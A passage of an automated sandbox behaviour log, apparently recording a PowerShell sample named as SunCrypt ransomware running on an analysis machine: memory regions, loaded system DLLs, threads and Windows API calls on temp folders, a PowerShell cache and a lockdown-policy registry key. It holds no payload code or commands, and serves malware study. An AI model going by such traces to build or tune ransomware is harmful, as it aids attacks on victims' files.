entry_point = 0x73fb12a1 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 1546 start_va = 0x73fc0000 end_va = 0x73fc8fff monitored = 0 entry_point = 0x73fc15a6 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 1547 start_va = 0x6aba0000 end_va = 0x6abacfff monitored = 0 entry_point = 0x6aba12d0 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 1548 start_va = 0x73e0000 end_va = 0x75dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000073e0000" filename = "" Region: id = 1549 start_va = 0x75e0000 end_va = 0x79dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000075e0000" filename = "" Region: id = 1552 start_va = 0xb60000 end_va = 0xb61fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b60000" filename = "" Region: id = 1553 start_va = 0xb70000 end_va = 0xb77fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "index.dat" filename = "\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\index.dat" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\index.dat") Region: id = 1554 start_va = 0xb80000 end_va = 0xb83fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "index.dat" filename = "\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\index.dat" (normalized: "c:\\users\\5alr3u30d3\\appdata\\roaming\\microsoft\\windows\\cookies\\index.dat") Region: id = 1555 start_va = 0xb90000 end_va = 0xb9ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "index.dat" filename = "\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\index.dat" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\windows\\history\\history.ie5\\index.dat") Region: id = 1556 start_va = 0x75150000 end_va = 0x75193fff monitored = 0 entry_point = 0x751663f9 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 1557 start_va = 0x7090000 end_va = 0x70dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007090000" filename = "" Region: id = 1558 start_va = 0x727d0000 end_va = 0x727ebfff monitored = 0 entry_point = 0x727da431 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 1559 start_va = 0x727c0000 end_va = 0x727c6fff monitored = 0 entry_point = 0x727c128d region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 1560 start_va = 0x70310000 end_va = 0x70361fff monitored = 0 entry_point = 0x703114be region_type = mapped_file name = "rasapi32.dll" filename = "\\Windows\\System32\\rasapi32.dll" (normalized: "c:\\windows\\system32\\rasapi32.dll") Region: id = 1561 start_va = 0x702f0000 end_va = 0x70304fff monitored = 0 entry_point = 0x702f12de region_type = mapped_file name = "rasman.dll" filename = "\\Windows\\System32\\rasman.dll" (normalized: "c:\\windows\\system32\\rasman.dll") Region: id = 1562 start_va = 0x73a50000 end_va = 0x73a5cfff monitored = 0 entry_point = 0x73a51326 region_type = mapped_file name = "rtutils.dll" filename = "\\Windows\\System32\\rtutils.dll" (normalized: "c:\\windows\\system32\\rtutils.dll") Region: id = 1563 start_va = 0x1a70000 end_va = 0x1a70fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001a70000" filename = "" Region: id = 1564 start_va = 0x7180000 end_va = 0x71bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007180000" filename = "" Region: id = 1565 start_va = 0x7ffdd000 end_va = 0x7ffddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 1566 start_va = 0x1a70000 end_va = 0x1a70fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001a70000" filename = "" Region: id = 1567 start_va = 0x6bcb0000 end_va = 0x6bcb5fff monitored = 0 entry_point = 0x6bcb125a region_type = mapped_file name = "sensapi.dll" filename = "\\Windows\\System32\\SensApi.dll" (normalized: "c:\\windows\\system32\\sensapi.dll") Region: id = 1568 start_va = 0x73c80000 end_va = 0x73c8ffff monitored = 0 entry_point = 0x73c838c1 region_type = mapped_file name = "nlaapi.dll" filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll") Region: id = 1569 start_va = 0x3d10000 end_va = 0x3d3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d10000" filename = "" Region: id = 1570 start_va = 0x72b0000 end_va = 0x736ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000072b0000" filename = "" Region: id = 1571 start_va = 0x79e0000 end_va = 0x7bdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000079e0000" filename = "" Region: id = 1572 start_va = 0x73550000 end_va = 0x73555fff monitored = 0 entry_point = 0x735514b2 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 1573 start_va = 0x75290000 end_va = 0x752cbfff monitored = 0 entry_point = 0x7529145d region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 1574 start_va = 0x79e0000 end_va = 0x7acffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000079e0000" filename = "" Region: id = 1575 start_va = 0x6fb40000 end_va = 0x6fb45fff monitored = 0 entry_point = 0x6fb42311 region_type = mapped_file name = "wshqos.dll" filename = "\\Windows\\System32\\wshqos.dll" (normalized: "c:\\windows\\system32\\wshqos.dll") Region: id = 1576 start_va = 0x74de0000 end_va = 0x74de4fff monitored = 0 entry_point = 0x74de15df region_type = mapped_file name = "wshtcpip.dll" filename = "\\Windows\\System32\\WSHTCPIP.DLL" (normalized: "c:\\windows\\system32\\wshtcpip.dll") Region: id = 1577 start_va = 0x75280000 end_va = 0x75285fff monitored = 0 entry_point = 0x75281673 region_type = mapped_file name = "wship6.dll" filename = "\\Windows\\System32\\wship6.dll" (normalized: "c:\\windows\\system32\\wship6.dll") Region: id = 1578 start_va = 0x72c0000 end_va = 0x72fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000072c0000" filename = "" Region: id = 1579 start_va = 0x7360000 end_va = 0x736ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007360000" filename = "" Region: id = 1580 start_va = 0x7ffa6000 end_va = 0x7ffa6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffa6000" filename = "" Thread: id = 1 os_tid = 0xfb0 Thread: id = 2 os_tid = 0xfcc Thread: id = 3 os_tid = 0xfd0 Thread: id = 4 os_tid = 0xfd4 Thread: id = 5 os_tid = 0xfd8 Thread: id = 6 os_tid = 0xfdc [0081.179] RegCloseKey (hKey=0x468) returned 0x0 [0083.147] CloseHandle (hObject=0x4bc) returned 1 [0090.645] CloseHandle (hObject=0x500) returned 1 [0099.046] LocalFree (hMem=0x315c98) returned 0x0 [0100.067] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\bx213pkj", nBufferLength=0x104, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\bx213pkj", lpFilePart=0x0) returned 0x2f [0100.067] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1a5f678) returned 1 [0100.067] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\bx213pkj" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\temp\\bx213pkj"), fInfoLevelId=0x0, lpFileInformation=0x1a5f93c | out: lpFileInformation=0x1a5f93c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa8550e60, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xab47a240, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xab47a240, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0100.068] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1a5f674) returned 1 [0100.068] ConvertStringSecurityDescriptorToSecurityDescriptorW (in: StringSecurityDescriptor="D:(A;OICI;FA;;;S-1-5-21-3683305739-1236715609-858405165-1000)(A;OICI;FA;;;BA)", StringSDRevision=0x1, SecurityDescriptor=0x1a5f950, SecurityDescriptorSize=0x0 | out: SecurityDescriptor=0x1a5f950*=0x0*(Revision=0x1, Sbz1=0x0, Control=0x8004, Owner=0x0*(Revision=0x0, SubAuthorityCount=0x0, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0), SubAuthority=0x0), Group=0x0*(Revision=0x0, SubAuthorityCount=0x0, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0), SubAuthority=0x14), Sacl=0x0*(AclRevision=0x0, Sbz1=0x0, AclSize=0x0, AceCount=0x14, Sbz2=0x0), Dacl=0x14*(AclRevision=0x14, Sbz1=0x0, AclSize=0x0, AceCount=0x2, Sbz2=0x44)), SecurityDescriptorSize=0x0) returned 1 [0100.070] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\bx213pkj", cchWideChar=47, lpMultiByteStr=0x1a5f8d0, cbMultiByte=49, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\bx213pkji\x0e\x88Ãg…â©üDþIièû¥\x01\x10\x9d+", lpUsedDefaultChar=0x0) returned 47 [0100.070] SetNamedSecurityInfoA () returned 0x0 [0100.073] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1a5f938) returned 1 [0100.073] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\bx213pkj", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x30 [0100.073] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\bx213pkj", nBufferLength=0x30, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\bx213pkj", lpFilePart=0x0) returned 0x2f [0100.073] FindFirstFileW (in: lpFileName="C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\bx213pkj\\*", lpFindFileData=0x1a5f6e8 | out: lpFindFileData=0x1a5f6e8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa8550e60, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xab47a240, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xab47a240, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x34d900 [0100.073] FindNextFileW (in: hFindFile=0x34d900, lpFindFileData=0x1a5f6f0 | out: lpFindFileData=0x1a5f6f0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa8550e60, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xab47a240, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xab47a240, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0100.073] FindNextFileW (in: hFindFile=0x34d900, lpFindFileData=0x1a5f6f0 | out: lpFindFileData=0x1a5f6f0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa8550e60, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xab47a240, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xab47a240, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0100.073] FindClose (in: hFindFile=0x34d900 | out: hFindFile=0x34d900) returned 1 [0100.073] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1a5f6a8) returned 1 [0100.073] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1a5f908) returned 1 [0100.074] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\bx213pkj", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x30 [0100.074] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\bx213pkj", nBufferLength=0x30, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\bx213pkj", lpFilePart=0x0) returned 0x2f [0100.074] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1a5f430) returned 1 [0100.074] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\bx213pkj" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\temp\\bx213pkj"), fInfoLevelId=0x0, lpFileInformation=0x1a5f6f8 | out: lpFileInformation=0x1a5f6f8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa8550e60, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xab47a240, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xab47a240, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0100.074] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1a5f42c) returned 1 [0100.075] FindFirstFileW (in: lpFileName="C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\bx213pkj\\*", lpFindFileData=0x1a5f71c | out: lpFindFileData=0x1a5f71c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa8550e60, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xab47a240, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xab47a240, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x34d900 [0100.075] FindNextFileW (in: hFindFile=0x34d900, lpFindFileData=0x1a5f71c | out: lpFindFileData=0x1a5f71c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa8550e60, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xab47a240, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xab47a240, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0100.075] FindNextFileW (in: hFindFile=0x34d900, lpFindFileData=0x1a5f71c | out: lpFindFileData=0x1a5f71c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa8550e60, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xab47a240, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xab47a240, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0100.075] FindClose (in: hFindFile=0x34d900 | out: hFindFile=0x34d900) returned 1 [0100.075] RemoveDirectoryW (lpPathName="C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\bx213pkj" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\temp\\bx213pkj")) returned 1 [0100.080] CloseHandle (hObject=0x4f4) returned 1 [0100.080] CloseHandle (hObject=0x4fc) returned 1 [0100.080] CloseHandle (hObject=0x4f8) returned 1 [0100.080] CloseHandle (hObject=0x4f0) returned 1 [0100.080] CloseHandle (hObject=0x468) returned 1 [0100.080] CloseHandle (hObject=0x508) returned 1 [0100.080] CloseHandle (hObject=0x4d4) returned 1 [0100.081] CloseHandle (hObject=0x4d0) returned 1 [0100.081] CloseHandle (hObject=0x4cc) returned 1 [0100.081] CloseHandle (hObject=0x4c8) returned 1 [0100.081] CloseHandle (hObject=0x4c4) returned 1 [0100.647] LocalFree (hMem=0x4274c30) returned 0x0 Thread: id = 7 os_tid = 0xfe0 [0128.235] CoUninitialize () Thread: id = 8 os_tid = 0xfe4 Thread: id = 9 os_tid = 0xfe8 Thread: id = 10 os_tid = 0xfec Thread: id = 11 os_tid = 0xff0 [0127.951] CoUninitialize () Thread: id = 12 os_tid = 0xffc Thread: id = 13 os_tid = 0x378 Thread: id = 14 os_tid = 0x818 Thread: id = 15 os_tid = 0x4bc [0102.619] GetFileAttributesW (lpFileName="C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\ModuleAnalysisCache" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\windows\\powershell\\moduleanalysiscache")) returned 0xffffffff [0102.619] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows\\PowerShell", nBufferLength=0x104, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows\\PowerShell", lpFilePart=0x0) returned 0x3e [0102.620] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x418ea88) returned 1 [0102.620] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows\\PowerShell" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\windows\\powershell"), fInfoLevelId=0x0, lpFileInformation=0x418ed4c | out: lpFileInformation=0x418ed4c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcfa29360, ftCreationTime.dwHighDateTime=0x1d706b0, ftLastAccessTime.dwLowDateTime=0xcfa29360, ftLastAccessTime.dwHighDateTime=0x1d706b0, ftLastWriteTime.dwLowDateTime=0xcfa29360, ftLastWriteTime.dwHighDateTime=0x1d706b0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0102.620] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x418ea84) returned 1 [0102.620] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\ModuleAnalysisCache", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x53 [0102.620] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\ModuleAnalysisCache", nBufferLength=0x53, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\ModuleAnalysisCache", lpFilePart=0x0) returned 0x52 [0102.620] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x418ecac) returned 1 [0102.620] CreateFileW (lpFileName="C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\ModuleAnalysisCache" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\windows\\powershell\\moduleanalysiscache"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x508 [0102.621] GetFileType (hFile=0x508) returned 0x1 [0102.621] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x418eca8) returned 1 [0102.621] GetFileType (hFile=0x508) returned 0x1 [0102.886] WriteFile (in: hFile=0x508, lpBuffer=0x6287eb4*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x418ed30, lpOverlapped=0x0 | out: lpBuffer=0x6287eb4*, lpNumberOfBytesWritten=0x418ed30*=0x1000, lpOverlapped=0x0) returned 1 [0102.888] WriteFile (in: hFile=0x508, lpBuffer=0x6287eb4*, nNumberOfBytesToWrite=0x286, lpNumberOfBytesWritten=0x418ed1c, lpOverlapped=0x0 | out: lpBuffer=0x6287eb4*, lpNumberOfBytesWritten=0x418ed1c*=0x286, lpOverlapped=0x0) returned 1 [0102.888] CloseHandle (hObject=0x508) returned 1 [0102.889] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\ModuleAnalysisCache", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x53 [0102.889] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\ModuleAnalysisCache", nBufferLength=0x53, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\ModuleAnalysisCache", lpFilePart=0x0) returned 0x52 [0102.889] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x418eac0) returned 1 [0102.890] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\ModuleAnalysisCache" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\windows\\powershell\\moduleanalysiscache"), fInfoLevelId=0x0, lpFileInformation=0x62ad0f0 | out: lpFileInformation=0x62ad0f0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xae4fa280, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xae4fa280, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xae7819e0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x1286)) returned 1 [0102.890] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x418eabc) returned 1 [0128.240] CoUninitialize () Thread: id = 16 os_tid = 0x4b8 [0081.029] SetThreadUILanguage (LangId=0x0) returned 0x409 [0081.040] EtwEventRegister () returned 0x0 [0081.041] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4ebf194, nSize=0x80 | out: lpBuffer="") returned 0x0 [0081.047] GetFileAttributesW (lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1")) returned 0x20 [0081.048] LocalReAlloc (hMem=0x340c10, uBytes=0x208, uFlags=0x2) returned 0x4265bc8 [0081.048] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x104, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0081.048] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebef58) returned 1 [0081.048] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebf21c | out: lpFileInformation=0x4ebf21c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0081.049] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebef54) returned 1 [0081.050] GetFileAttributesW (lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1")) returned 0x20 [0081.050] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0081.050] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0081.050] NtQuerySystemInformation (in: SystemInformationClass=0xa4, SystemInformation=0x4ebf0e8, Length=0x20, ResultLength=0x4ebf158 | out: SystemInformation=0x4ebf0e8, ResultLength=0x4ebf158*=0x0) returned 0xc0000003 [0081.050] GetSystemInfo (in: lpSystemInfo=0x4ebf164 | out: lpSystemInfo=0x4ebf164*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0081.051] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x4ebf0f4 | out: phkResult=0x4ebf0f4*=0x4b8) returned 0x0 [0081.051] RegQueryValueExW (in: hKey=0x4b8, lpValueName="__PSLockdownPolicy", lpReserved=0x0, lpType=0x4ebf110, lpData=0x0, lpcbData=0x4ebf10c*=0x0 | out: lpType=0x4ebf110*=0x0, lpData=0x0, lpcbData=0x4ebf10c*=0x0) returned 0x2 [0081.051] RegCloseKey (hKey=0x4b8) returned 0x0 [0081.055] EtwEventRegister () returned 0x0 [0081.056] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0081.056] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0081.056] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebef88) returned 1 [0081.056] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x1da8c9c | out: lpFileInformation=0x1da8c9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0081.056] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebef84) returned 1 [0081.062] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: 